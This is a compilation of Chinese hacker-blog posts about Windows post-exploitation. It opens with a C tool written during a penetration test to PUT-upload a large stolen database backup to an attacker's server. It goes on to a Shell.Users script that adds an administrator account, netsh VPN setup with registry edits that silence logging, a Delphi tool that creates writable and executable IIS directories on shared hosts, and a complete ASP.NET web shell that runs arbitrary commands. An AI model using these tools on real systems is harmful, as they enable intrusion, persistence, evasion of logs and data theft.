注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找找了代码,写了个命令行下上传大文件的C程序.

代码:

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

void Usage (char *name);//帮助信息

BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile)
{
INTERNET_BUFFERS BufferIn = {0};
DWORD dwBytesRead;
DWORD dwBytesWritten;
BYTE pBuffer[302480]; // Read from file in 300M chunks,最大支持300M文件

BOOL bRead, bRet;

BufferIn.dwStructSize = sizeof( INTERNET_BUFFERS );
//使用put方式上传文件:
HINTERNET hRequest = HttpOpenRequest (hConnect, "PUT",
localFile, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (!hRequest)
{
printf("Failed to open request handle: %lu\n", GetLastError ());
return FALSE;
}

//打开指定的文件:
HANDLE hFile = CreateFile (upFile, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("\nFailed to open local file %s.", upFile);
return FALSE;
}

BufferIn.dwBufferTotal = GetFileSize (hFile, NULL);
printf ("File size is %d\n", BufferIn.dwBufferTotal );

if(!HttpSendRequestEx( hRequest, &BufferIn, NULL, HSR_INITIATE, 0))
{
printf( "Error on HttpSendRequestEx %lu\n",GetLastError() );
return FALSE;
}

DWORD sum = 0;
do
{
if  (!(bRead = ReadFile (hFile, pBuffer, sizeof(pBuffer),&dwBytesRead, NULL)))
{
printf ("\nReadFile failed on buffer %lu.",GetLastError());
break;
}
if (!(bRet=InternetWriteFile( hRequest, pBuffer, dwBytesRead,&dwBytesWritten)))
{
printf ("\nInternetWriteFile failed %lu", GetLastError());
break;
}
sum += dwBytesWritten;
}
while (dwBytesRead == sizeof(pBuffer)) ;

CloseHandle (hFile);
printf ("Actual written bytes: %d\nupload %s successed!\n", sum,localFile);

//结束一个HTTP请求:
if(!HttpEndRequest(hRequest, NULL, 0, 0))
{
printf( "Error on HttpEndRequest %lu \n", GetLastError());
return FALSE;
}
return TRUE;
}

int main(int argc, char **argv)

{
//put 127.0.0.1 /1.db c:\\wmpub\\1.exe
if(argc!=4)
{
Usage(argv[0]);
return 0;
}

//char *ServerName="127.0.0.1"; //这里填写URL地址
char *ServerName=argv[1];

HINTERNET hSession = InternetOpen("HttpSendRequest",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); //同步方式
if(!hSession){
printf("Failed to open InternetOpen\n");
exit(0);
}
//连接到一个http服务:
HINTERNET hConnect = InternetConnect(hSession,
ServerName,
INTERNET_DEFAULT_HTTP_PORT, //连接到80端口,可以修改成任意端口,比如53
NULL,
NULL,
INTERNET_SERVICE_HTTP, //服务类型HTTP，FTP或Gopher
0,
1);

if(!hConnect)
{
printf("error InternetConnect\n");
return 0;
}

//TCHAR *putfile="c:\\wmpub\\1.exe"; //上传的程序
TCHAR *putfile=argv[3];
TCHAR *putlocalfile=argv[2];
BOOL sigh;
sigh=UseHttpSendReqEx(hConnect,putfile,putlocalfile);
if(!sigh)
{
printf("error UseHttpSendReqEx\n");
return 0;
}

return 0;
}

//输出帮助的典型方法:
void Usage (char *name)
{
fprintf(stderr,"===============================================================================\n"
"\t名称：利用PUT上传300M的大文件\n"
"\t环境：Win2003+Visual C++ 6.0\n"
"\t作者：pt007@vip.sina.com\n"
"\tQQ：  7491805\n"
"\t声明：本软件由pt007原创，转载请注明出处，谢谢!\n"
"\t使用说明:1.db为上传后保存后的文件,c:\\wmpub\\1.exe为本地要上传的大文件,\n\t需要IIS里面设置允许写入!\n"
"\t例子:%s 192.168.1.101 /1.db c:\\wmpub\\1.exe\n"
"===============================================================================\n",name);
}

相关文章

• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

今天研究了一下用户控制面板文件nusrmgr.cpl，发现调用的是Shell.Users来加用户，它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话，这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外，这也可能是一种新的加用户的方法。代码如下：

js:

var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

vbs:

Set  o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3

相关文章

• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

FOR /L %I in (1,1,255) DO PING 192.168.1.%I -n 1 -w 100 >> c:\ping.txt

然后查看ping.txt的结果,一台一台测试过去
for /l %p in (1,1,254) do @ping 192.168.1.%p -n 1 |find "reply from" /i  >>c:\ping.txt

上面这条命令可以把能ping通的机器单独整理出来
修改网关的命令如下:
cmd /c netsh interface ip set address name=" 本地连 接" source=static addr=192.168.1.100 mask=255.255.255.0 gateway=192.168.1.1 gwmetric=1

修改DNS
cmd /c netsh interface ip set dns name="本地连接" source=static addr=61.134.1.9

相关文章

• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

两块以上网卡的win2000做vpn很方便，添加nat协议后，客户端拨入，能够使用远程网络连接internet。 使得部分客户端可提高网络速度，并达到代理的作用。

一块网卡的winxp，win2003做类似的vpn仍然很方便，nat协议添加后，再添加两个接口，一个是本地连接，一个是内部，设置本地连接为全转发，内部为私有模式，既可让有权限的用户拨入。

一块网卡的win2000，做类似的vpn就不方便了，nat协议添加后，再添加接口，只可以添加上本地连接，内部不容许图形界面的添加，察看了netsh dump >c:\1.txt后，尝试在netsh命令添加内部接口，通过。 命令为：netsh routing ip nat add interface 内部 private

下面是部分常用命令：

netsh ras set user username permit //设置用户授权，该用户不能为tsinternetuser support_388945a0等。

netsh ras ip set addrassign pool //设置静态地址池模式

netsh ras ip add range 10.0.0.1 10.0.0.100 // 设置静态池范围 ，要用标准的局域网地址，避免将来在访问internet时候地址转发错误。

netsh routing ip nat install //添加nat协议

netsh routing ip nat add interface 本地连接 full //添加nat接口本地连接全转发

netsh routing ip nat add interface 内部 private //添加nat借口内部私有模式

igmp同样可以在netsh配置，命令行很长：

netsh routing ip igmp install

netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV2 ifenabled=enable robustvar=2 startupquerycount=2 startupqueryinterval=31 genqueryinterval=125 genqueryresptime=10 lastmemquerycount=2 lastmemqueryinterval=1000 accnonrtralertpkts=YES

netsh routing ip igmp add interface name="本地连接" igmpprototype=IGMPPROXY ifenabled=enable
如果配置前已经有接口，就要先删除：

netsh routing ip igmp delete interface 内部 //与此类似

路由和远程访问服务会在系统、安全日记中记录不少信息，比如ipsec、登陆信息。

修改一下注册表可以避免：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters

ProhibitIPsec"=dword:00000001

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters

LoggingFlags"=dword:00000000

现在除了登陆信息，ipsec,remoteaccess警告，已经不记录。

----------------------------------------

还有值得一提的是建立好地vpn，通常使用的都是pptp协议，tcp1723端口，如果我们在网卡的ip策略添加了tcp1723的容许条目，基本上可以拨入。为什么是基本呢，因为pptp除了 tcp1723外还有一个ip47号协议，不同于tcp不同于udp，此协议对于认证很重要。如果网络上的防火墙割断的话，会出现拨号->用户认证 ->不通过认证断开的问题。

在配置vpn的时候，还需要remoteregister服务的支持，建立好以后可以关掉。

workstation , server,rpc同样在配置时候需要。

----------------------------------------

经测试，全命令行的建立vpn后，rrasmgmt.msc不出现具体配置信息。也就是说只有看网络连接文件夹，才能看出来一个拨入的连接

相关文章

• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2008年09月8日 -- Windows2003单网卡下设置VPN网络
• 2008年08月30日 -- 网络加速器的秘密-VPN概念与安全
• 2007年11月16日 -- 高级内网渗透工具:Paris (创建VPN)
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限

很久，很久没有和大家聊天了，很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步，没有研究，没有深入的去了解，就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就！
好了，屁话放了太多了。明白的人，不看上面的话都明白。不明白的人，看了也许永远也不会明白。

系统中有个VBS也可以实现这样的功能的。不过我认为，如果在台虚拟主机中，存在多个网站的情况下。
建立虚拟目录，也只能在第一个默认的站点中。一般情况下虚拟主机默认是关掉的。也就是你建好了，通过HTTP也不能访问。
从MSDN中，我找到了一些相关的技术资料，写了个小工具。可以建立在其它站点中。这里看来说起来有点混乱。

我举例给大家说说吧。
拿个虚拟主机的 Internet 信息服务中的列表给大家看看就明白了

+默认 web 站点(已停止)
+管理 web 站点(已停止)
+163.com
+263.com
+363.com

好，上面大家看到了，有三个站点是开放的。而前面那个默认的已经被关闭了。
这时，我们用VBS建立虚拟目录，是建立在默认的站点中，而站点被停止了，所以建立成功后，也不能访问。
比如：我们怎么能在263.com这个站中，建立一个目录，比如:VDIR,通过http://www.163.com/VDIR就可以访问了呢？
通过查找资料，我得到了，在建立的时候，允许指定一个序号，比如：1..N

1 : 表示，在默认的站点中，然后按着这个顺序来，而363.com对应的序号就是5.
明白了这个道理后，用程序来实现这个功能就比较简单了。当然，你会说，那么我想在263.com这个站中，建立。
但是我不知道，这个站对应的序号是多少，对于这个问题，我们只能从序号3开始一直往下建立，(1,2对应的是前面默认的)
当建立一个后，可以读出他的配置信息，返回给大家。建一个后，你就明白是不是建立在你想要建的那个站中，如果不是。
也可以把他删掉。再增加序号。：）（有没有一个工具，可以在命令行下，实现把所有的主机站点信息，比如:名称，对应目录之类的列出来?原理差不多，你看完代码应该会写了）

以下是代码:
program VDir;

{$APPTYPE CONSOLE}

uses
ActiveX,SysUtils,ComObj;
Var
VName,
VPath,
Vattrib : String;

createVpath : Boolean;
WebIndex : integer;

Procedure ShowHelp;
Begin
WriteLn('=========== VDir by CYFD! ============');
WriteLn('');
WriteLn('Useag:'+ParamStr(0)+' <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]');
WriteLn('');
WriteLn('Sample:'+ParamStr(0)+' -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3');
WriteLn('');
WriteLn(' CmdType :');
WriteLn(' 1 : create');
WriteLn(' 0 : delete');
WriteLn(' Vattrib :');
WriteLn(' 0 : AccessScript');
WriteLn(' 1 : AccessRead');
WriteLn(' 2 : AccessWrite');
WriteLn(' 3 : AccessExecute');
WriteLn(' 4 : EnableDirBrowsing');
End;

Procedure ParseParam(Str : String);
var
tStr : String;
Begin
tStr := lowercase(Copy(Str,1,3));
if tStr='-n:' then
VName := Copy(Str,4,Length(Str));
if tStr='-p:' then
VPath := Copy(Str,4,Length(Str));
if tStr='-c:' then
createVpath := StrToIntDef(Copy(Str,4,Length(Str)),1) = 1;
if tStr='-r:' then
Vattrib := Copy(Str,4,Length(Str));
if tStr='-i:' then
WebIndex := StrToIntDef(Copy(Str,4,Length(Str)),1);

End;

Function GetStrForSpace(SourceStr :String ; JGZF:char ; Index:integer):String;
var
Pchar1 : pchar;
i , count : integer;
cStr : string;
begin
Count := 0;
Pchar1 := pchar(SourceStr);
cStr := '';
for i:=0 to length(Pchar1)-1 do begin
if pchar1 = JGZF then
begin
Count := Count + 1;
if Count = Index then begin
break;
end;
end
else if Count = Index -1 then cStr := cStr + pchar1;
end;
Result := cStr;
end;

procedure createVDir(Vdirpath:string);
var
WebSite, WebServer, WebRoot, VDir,Binds: Variant;
BindStr : String;
begin
Try
WebSite := createOleObject('IISNamespace');
WebSite := WebSite.GetObject('IIsWebService', 'localhost/w3svc');
WebServer := WebSite.GetObject('IIsWebServer', IntTostr(WebIndex));

// 这里的WebIndex就是你要建立的序号.

WebRoot := WebServer.GetObject('IIsWebVirtualDir', 'Root');

if createVpath then Begin
VDir := WebRoot.create('IIsWebVirtualDir', VName);
Vdir.AccessScript := pos(',0,',Vattrib) >0;
VDir.AccessRead := pos(',1,',Vattrib) >0;
VDir.AccessWrite := pos(',2,',Vattrib) >0;
VDir.AccessExecute := pos(',3,',Vattrib) >0;
VDir.EnableDirBrowsing := pos(',4,',Vattrib) >0;

// 以上几行是为你建立的目录设访问权限。可写，可读，可执行，可流览...

VDir.Path :=VDirPath;
VDir.SetInfo;

Binds := WebServer.ServerBindings;
BindStr := Binds[0]+':';
WriteLn('');
WriteLn('Result :');
WriteLn('');
WriteLn('IP : '+ GetStrForSpace(BindStr,':',1));
WriteLn('Port : '+ GetStrForSpace(BindStr,':',2));
WriteLn('HostName : '+ GetStrForSpace(BindStr,':',3));
WriteLn('');
WriteLN('Path Is: ' + WebRoot.Path);
WriteLN('Index IS: ' + IntTostr(WebIndex));
WriteLn('Comment : ' + WebServer.ServerComment);

// 上面几行就是得到站点的一些信息，IP，端口，主机名，路径，等等..

WriteLn('');
WriteLn('create success.');
End
Else Begin
WebRoot.delete('IIsWebVirtualDir', VName);
Writeln('delete Success.');
End;
Except
WriteLn('Fail.');
End;

end;

Var
i : integer;
begin

coinitialize(nil);
if ParamCount <4 then Begin
ShowHelp;
Exit;
End;

For i:=1 to ParamCount do
ParseParam(Paramstr(i));

if (ParamCount = 5) and (Vattrib ='') then Begin
ShowHelp;
Exit;
End;
Vattrib := ','+Vattrib+',';
createVDir(VPath);

{ TODO -oUser -cConsole Main : insert code here }

end.
代码可以用COPY到记事本中，然后保存为VDIR.DPR 文件，用DELPHI打开编译一下就行了。

使用方法:
我要在默认站点(序号为1)中建立一个，可读，可写，可注浏览的目录，名称为: yfd 路径为c:
那么这么使用:

D:VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:1,2,4

程序帮助显示:
Useag:VDir.exe <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]

Sample:D:VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:0,1,3

CmdType :
1 : create
0 : delete
Vattrib :

0 : AccessScript (脚本访问)
1 : AccessRead (可读)
2 : AccessWrite (可写)
3 : AccessExecute (可执行)
4 : EnableDirBrowsing (可浏览)

-n: 建立的目录名称

-P: 建立的目录路径

-i: 序号

-c: (1表示建立,0表示删除)

-r: (当选择建立的时候,请输入他相应的访问权限值,删除的时候可以不写).

返回结果:

D:>VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:1,2,4

Result :

IP : 127.0.0.1
Port : 80
HostName :

Path Is: E:ScriptWEBTEST
Index IS: 1
Comment : 默认 Web 站点

create success.

相关文章

• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

服务中显示：
Windows Firewall/Internet Connection Sharing (ICS)
我们可以用
net stop "Windows Firewall/Internet Connection Sharing (ICS)"直接关闭，但是并未给提示，而且也没有起到效果，3389依然连接不上
net start之时却提示服务启动~~~郁闷ing
请教n多朋友,有的说停止服务，有的说kill进程，均告失败。终于在俺哥那里找到了答案，现分享出来
C:\>netsh
netsh>firewall
netsh firewall>show

下列指令有效:

命令从 netsh 上下文继承:
show alias - 列出所有定义过的别名。
show helper - 请列出所有头等助手。
show mode - 显示当前的模式。

此上下文中的命令:
show allowedprogram - 显示防火墙允许的程序配置。
show config - 显示防火墙配置。
show currentprofile - 显示当前防火墙配置文件。
show icmpsetting - 显示防火墙 ICMP 配置。
show logging - 显示防火墙记录配置。
show multicastbroadcastresponse - 显示防火墙多播/广播响应配置。
show notifications - 显示防火墙操作配置。
show opmode - 显示防火墙端口配置。
show portopening - 显示防火墙端口配置。
show service - 显示防火墙服务配置。
show state - 显示当前防火墙状态。

相关文章

• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

@echo off
title 密码验证
SETLOCAL
set pwd=0
set times=3

echo ________________________________________________________________________________
echo 您现在使用的是[Anlge]的CMD，没有经过[Angle]的允许不能执行任何命令，
echo 您的这次使用的所有操作以及留言都已经记入日志，如果您还没有密码，那请与
echo [Angle]联系，已经有密码了请您输入密码！
echo ________________________________________________________________________________
echo ####################################################################### >> e:\CMD\mylog.txt
echo 操作： 激活密码验证 时间：%time% 日期：%date% >> e:\CMD\mylog.txt
echo 状态： 等待验证…… >> e:\CMD\mylog.txt
echo. >> e:\CMD\mylog.txt
echo [ LOGIN ]

:password
set /p pwd= 请输入您的密码：
set /A times=%times%-1
if %pwd%==fangzi goto pass
echo ***** 密码验证错误，请您重新输入 您还有 %times% 次机会输入密码 *****
echo .
if %times%==0 goto close
echo 状态： 用户输入密码 验证失败 时间：%time% >> e:\CMD\mylog.txt
goto password

:close
echo 状态： 用户3次输入密码错误 程序锁定 时间：%time% >> e:\CMD\mylog.txt
title 对不起，您无法使用[Angle]的CMD
echo --------------------------------------------------------------------------------
echo 由于您3次密码验证失败，程序已经被锁定，您已经无法继续操作，您可以选择关闭
echo 本窗口,您也可以通过留言来与[Angle]取得联系，输入留言后，请按回车提交！
echo --------------------------------------------------------------------------------
echo [ MESSAGES ]

:message
echo ________________________________________________________________________________
set /p msg= 请输入您的留言：
echo . >> e:\CMD\mymsg.txt
echo ####################################################################### >> e:\CMD\mymsg.txt
echo 日期：%date% 时间：%time% >> e:\CMD\mymsg.txt
echo 留言内容： >> e:\CMD\mymsg.txt
echo %msg% >> e:\CMD\mymsg.txt
echo. >> c:\message.txt
echo …… OK ……
echo 您的留言已经记录，您可以选择关闭窗口也可以选择继续留言
echo 操作： 用户留言 时间：%time% >> e:\CMD\mylog.txt
goto message

:pass
echo 状态： 程序已开放，欢迎使用 时间：%time% >> e:\CMD\mylog.txt
title [Angle]的CMD
ENDLOCAL

-----------------------------------------------------------------

以下是setup.bat

@echo off
copy /y lock.bat %windir%\lock.bat
echo lock.bat安装成功
regedit /s lock.reg
echo lock.reg注册成功
-----------------------------------------------------

用来卸装的文件
以下是unlock.reg

@echo off
del /f lock.bat %windir%\lock.bat
echo lock.bat删除成功
regedit /s unlock.reg
echo lock.reg反注册成功

------------------------------------------------------

双击setup.bat即可安装！

在使用CMD时，密码为fangzi （全为小写，这里的密码对大小写敏感）
所有的日志存放在E:\CMD\mylog.txt中
所有的留言存放在E:\CMD\mymsg.txt中

相关文章

• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年09月21日 -- Do All in CmdShell
• 2006年09月21日 -- cmd.aspx

<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="system.IO" %>
<script runat="server">
sub runcmd(Src As Object, E As EventArgs)
dim but as string
dim tempfile as string=server.MapPath(".") & "\" & "test.txt"
shell("cmd.exe /c " & cmd.text & " > " & tempfile,,true,20000)
dim myread as new streamreader(tempfile,encoding.default)
but=replace(myread.readtoend,vbcrlf,"<br>")
but=replace(but," "," ")
result.text=but
myread.close
file.exists(tempfile)
file.delete(tempfile)
cmd.text=""
end sub
</script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>ASP.NET Shell V1.0 By fineacer</title>
</head>
<body>
<form runat="server">
<asp:TextBox ID="cmd" runat="server" />
<asp:Button ID="Button" runat="server" Text="Run" OnClick="runcmd" />
<p><asp:Label ID="result" runat="server" /></p>
</form>
</body>
</html>


ASP.NET环境下执行cmd命令的程序，相当于cmd.asp不过这个需要asp.net环境,由于IIS6的机制，本程序不能在IIS6运行，不过可以很好的支持IIS5.x ＋ .net framework.

相关文章

• 2010年01月27日 -- ASP.NET+Win2003虚拟主机安全设置
• 2009年07月18日 -- 命令行下的PUT方式上传大文件
• 2009年07月15日 -- 命令行下一种新的加帐号的方法
• 2008年10月29日 -- CMD下设置网关
• 2007年05月9日 -- CMD下建立VPN
• 2006年11月26日 -- 命令行下建立虚拟目录
• 2006年11月26日 -- netsh配置防火墙
• 2006年11月15日 -- 加密CMD使电脑溢出也拿不到CMD权限
• 2006年09月21日 -- Do All in CmdShell